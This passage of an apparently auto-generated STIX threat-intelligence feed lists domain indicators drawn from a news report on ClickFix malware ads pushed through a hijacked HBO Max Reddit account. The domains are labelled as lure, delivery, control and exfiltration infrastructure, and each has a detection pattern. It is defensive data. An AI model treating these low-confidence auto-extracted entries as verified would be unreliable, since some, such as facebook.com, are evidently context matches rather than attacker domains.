News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--14367a2c-c7e7-49e3-a39a-2a48467ee954","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: alfredaps.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ltration Domain filequanticore[.]com; filesiriuscore[.]com; alfredaps[.]com; hbomaxx[.]us; hbomax-macos[.]com; bright-links[.]com; co","pattern":"[domain-name:value = 'alfredaps.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d2cab199-d225-4933-8fc6-5fb095239784","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: applediag.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m; opendisplay[.]us Provisioning-linked lure domains Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub","pattern":"[domain-name:value = 'applediag.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--59100979-ac0f-4d60-8b49-47ab67045168","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: arkypc.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: hbubagent[.]com MacSync delivery and control domains Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; gro","pattern":"[domain-name:value = 'arkypc.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--daa33bcd-6995-4b3c-8f70-67c639b6a185","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: basequill9.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekm","pattern":"[domain-name:value = 'basequill9.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4fd2c9e4-3e51-4931-9c1c-eeed5930c98a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: beaocnagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: aesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MacSync delivery and control domains Dom","pattern":"[domain-name:value = 'beaocnagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--31bd2270-b39d-4692-b04b-1ec50a630080","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bright-links.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: e[.]com; alfredaps[.]com; hbomaxx[.]us; hbomax-macos[.]com; bright-links[.]com; codex-notes[.]com; storageprofiler[.]com; cladesktop[.]g","pattern":"[domain-name:value = 'bright-links.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a6fc3b43-2650-4e50-bfdd-a0772e239ef0","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: broadwalkindia.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]com; cim-kolea[.]com; hindustanagency[.]com Teardown and deli","pattern":"[domain-name:value = 'broadwalkindia.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--45695e37-366f-4517-b878-ba3b89fe4672","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: camaligsalvatrefoils.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -command lure domains Domain flutelikelurkerunsinewy[.]com; camaligsalvatrefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com","pattern":"[domain-name:value = 'camaligsalvatrefoils.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8e9a90d0-b31a-4e91-9e84-174408364e5b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: canvas-35.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery dom","pattern":"[domain-name:value = 'canvas-35.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5b2ebd67-b0b3-4488-b037-3270a828c750","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: cehamilton.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]com; cim-kolea[.]com; hindustanagency[.","pattern":"[domain-name:value = 'cehamilton.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a07b1d42-67e8-4e7c-bd68-42d494dd8138","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: chatgpt-safepage.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: cstoragetips[.]com Provisioning-neighborhood domains Domain chatgpt-safepage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsof","pattern":"[domain-name:value = 'chatgpt-safepage.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1311920b-7dc0-4613-b373-4925f00c5eda","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: cladesktop.gitlab.io","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ight-links[.]com; codex-notes[.]com; storageprofiler[.]com; cladesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]c","pattern":"[domain-name:value = 'cladesktop.gitlab.io']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f9ac9aae-7890-43d7-a4f4-0290f468a678","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: claude-tools.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; hbomaxx[.]app; codex-craft[.]com; code-desktop[.]com; claude-tools[.]com; clean-disk-tools[.]com; opendisplay[.]us Provisioning-li","pattern":"[domain-name:value = 'claude-tools.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ef424d4a-ee7b-4aa2-8446-4ff0e053d09b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: claud-tips.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; mu","pattern":"[domain-name:value = 'claud-tips.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9be2e854-0d41-4c62-b783-7231a0cd4b14","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: clean-disk-guide.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: r-focused ads linked to codex-craft[.]com, 15 tied to apple.clean-disk-guide[.]com, 11 for code-desktop[.]com and six for hbomax-macos[.]com","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9a847fd5-f08c-4f2c-bafb-273d9d036593","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: clean-disk-tools.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: codex-craft[.]com; code-desktop[.]com; claude-tools[.]com; clean-disk-tools[.]com; opendisplay[.]us Provisioning-linked lure domains Domain","pattern":"[domain-name:value = 'clean-disk-tools.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--aaa23d4d-5304-4669-b76e-ec3190f0faab","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: cli-desktop.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: tes[.]com; storageprofiler[.]com; cladesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]com; clean-disk-guide[","pattern":"[domain-name:value = 'cli-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--69b68eb6-df9f-4f77-a3f7-96129f12f135","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: cli-guides.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]bike SIC Windows-route domains Domain crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]c","pattern":"[domain-name:value = 'cli-guides.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a0f369df-f7d0-4264-893c-e9cc2129505f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: cli-stack.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: rofiler[.]com; cladesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]com; clean-disk-guide[.]com Copied-comm","pattern":"[domain-name:value = 'cli-stack.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b35c4b6c-203f-4eb3-8d0d-6acc6d695223","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: clveeragent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cos","pattern":"[domain-name:value = 'clveeragent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9df40419-acdc-42fa-838b-01bd91d1c63f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: cmux-lab.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: om; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; c","pattern":"[domain-name:value = 'cmux-lab.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--50d538e8-c60b-4d23-a713-528d30eccf14","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: code-desktop.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: raft[.]com, 15 tied to apple.clean-disk-guide[.]com, 11 for code-desktop[.]com and six for hbomax-macos[.]com. The compromised account g","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9f9f1fe0-169c-4c0b-907b-969ab9cce89a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: codex-craft.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: nts using hbomaxx[.]app, 36 developer-focused ads linked to codex-craft[.]com, 15 tied to apple.clean-disk-guide[.]com, 11 for code-des","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a22ceee1-c787-4cc7-8bd0-76aa4560849a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: codex-notes.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; hbomaxx[.]us; hbomax-macos[.]com; bright-links[.]com; codex-notes[.]com; storageprofiler[.]com; cladesktop[.]gitlab[.]io; cli-des","pattern":"[domain-name:value = 'codex-notes.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1931dbcc-a01c-4e56-96ef-2b6b03a235f1","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: codex-paths.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com;","pattern":"[domain-name:value = 'codex-paths.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f665c96f-29ce-45fd-b7c6-f356a17d9dd2","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: congiagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; ce","pattern":"[domain-name:value = 'congiagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5f7d44d2-560e-4ff0-9556-2a5cb29a99f7","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: cosimcagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]com; cim-kolea[.]com;","pattern":"[domain-name:value = 'cosimcagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fa7f6b43-246f-4c8a-b044-cfacf7d59d8f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: crisp-paths.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: abar55[.]namebright[.]bike SIC Windows-route domains Domain crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]c","pattern":"[domain-name:value = 'crisp-paths.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--579a7e4f-9064-442e-8907-2d6a7564a8c1","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: denverplumbingandwaterheater.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: vmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumbingandwaterheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellare","pattern":"[domain-name:value = 'denverplumbingandwaterheater.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5ea79963-fb2b-4cbd-b994-2bdbc482ced2","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: desktop-version.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: pla[.]com; glrack[.]com Fake wallet delivery domains Domain desktop-version[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]","pattern":"[domain-name:value = 'desktop-version.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ed68217c-32b4-4738-b921-2bbdd7339ad6","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: dogtrainersgeorgia.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: dscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumbingandwaterheater[.]com; restoremental[.]com;","pattern":"[domain-name:value = 'dogtrainersgeorgia.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7b4aeebe-9732-458f-a5b1-35bb25ee32e3","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: ember-bridge.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com macOS loader-delivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry","pattern":"[domain-name:value = 'ember-bridge.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c7b07b5a-560b-49b0-a83d-f9b640019b89","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: facebook.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 3 Amatera direct-to-IP TLS command-and-control server using facebook[.]com SNI IP address 165.22.199[.]85 September macOS telemetry","pattern":"[domain-name:value = 'facebook.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d985ef43-7589-4358-a7d6-2db5746c478e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: fern-plume.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: y and control domains Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov","pattern":"[domain-name:value = 'fern-plume.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1b6be300-b2e8-4312-91f5-0c549c28c053","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: filequanticore.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ss 38.244.158[.]56 AMOS helper /contact exfiltration Domain filequanticore[.]com; filesiriuscore[.]com; alfredaps[.]com; hbomaxx[.]us; hbo","pattern":"[domain-name:value = 'filequanticore.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--16c2bc00-6a88-473a-a543-2c8cce589c92","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: filesiriuscore.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: S helper /contact exfiltration Domain filequanticore[.]com; filesiriuscore[.]com; alfredaps[.]com; hbomaxx[.]us; hbomax-macos[.]com; brigh","pattern":"[domain-name:value = 'filesiriuscore.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--961c1703-0dde-4ebe-aa31-f22f44ddd404","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: flutelikelurkerunsinewy.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ; 